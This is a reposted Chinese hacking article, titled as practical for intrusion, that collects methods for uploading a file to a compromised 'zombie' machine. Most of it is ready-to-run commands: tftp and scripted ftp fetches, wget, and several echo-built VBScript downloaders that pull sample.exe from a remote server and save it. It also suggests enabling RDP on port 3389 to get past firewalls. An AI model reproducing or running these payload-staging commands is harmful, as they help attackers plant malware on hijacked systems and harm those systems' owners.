欢迎光临
我们一直在努力

上传方法总结[对入侵很实用]-数据库专栏,SQL Server

建站超值云服务器,限时71元/月

作者:小虾米  来自:朋友的家

现在将本人用于上传的方法进行汇总如下:

1. tftp法
先在自己某机器上建个tftp服务器,如执行tftpd32.exe,
再将文件(sample.exe)上传到别的机器中(肉鸡),
肉鸡cmd中执行: tftp -i 服务器ip get sample.exe

2. ftp法
肉鸡cmd中执行:
echo open ftp服务器ip [端口]>ftp.txt
echo username>>ftp.txt
echo password>>ftp.txt
echo get sample.exe>>ftp.txt
echo bye>>ftp.txt
ftp -s:ftp.txt
del ftp.txt

3. 工具法
利用wineggdrop的wget.exe
肉鸡cmd中执行:wget 网站/sample.exe

4. 利用dl.vbe法
肉鸡cmd中执行:
echo with wscript:if .arguments.count^<2 then .quit:end if >dl.vbe
echo set aso=.createobject(“adodb.stream”):set web=createobject(“microsoft.xmlhttp”) >>dl.vbe
echo web.open “get”,.arguments(0),0:web.send:if web.status^>200 then quit >>dl.vbe
echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with >>dl.vbe

cscript dl.vbe http://*。*。*。*:88/sample.exe sample.exe

5. 利用iget.vbe法
方法同4,
肉鸡cmd中执行:
echo ilocal = lcase(wscript.arguments(1)) >iget.vbe
echo iremote = lcase(wscript.arguments(0)) >>iget.vbe
echo set xpost = createobject(“microsoft.xmlhttp”) >>iget.vbe
echo xpost.open “get”,iremote,0 >>iget.vbe
echo xpost.send() >>iget.vbe
echo set sget = createobject(“adodb.stream”) >>iget.vbe
echo sget.mode = 3 >>iget.vbe
echo sget.type = 1 >>iget.vbe
echo sget.open() >>iget.vbe
echo sget.write(xpost.responsebody) >>iget.vbe
echo sget.savetofile ilocal,2 >>iget.vbe

cscript iget.vbe http://*。*。*。*/sample.exe sample.exe

6. 利用http网站vbe法
echo set xpost = createobject(“microsoft.xmlhttp”) >dsa.vbe
echo xpost.open “get”,”http://*.*.*.*/sample.exe”,0 >>dsa.vbe
echo xpost.send() >>dsa.vbe
echo set sget = createobject(“adodb.stream”) >>dsa.vbe
echo sget.mode = 3 >>dsa.vbe
echo sget.type = 1 >>dsa.vbe
echo sget.open() >>dsa.vbe
echo sget.write(xpost.responsebody) >>dsa.vbe
echo sget.savetofile “sample.exe”,2 >>dsa.vbe

cscript dsa.vbe
del dsa.vbe

7. 3389法
可以开3389,然后登陆,进行本地的下载。该方法对服务器上传很严格的机器特有效。(包括硬件防火墙)

8. 其他未公开的方法

赞(0)
版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com 特别注意:本站所有转载文章言论不代表本站观点! 本站所提供的图片等素材,版权归原作者所有,如需使用,请与原作者联系。未经允许不得转载:IDC资讯中心 » 上传方法总结[对入侵很实用]-数据库专栏,SQL Server
分享到: 更多 (0)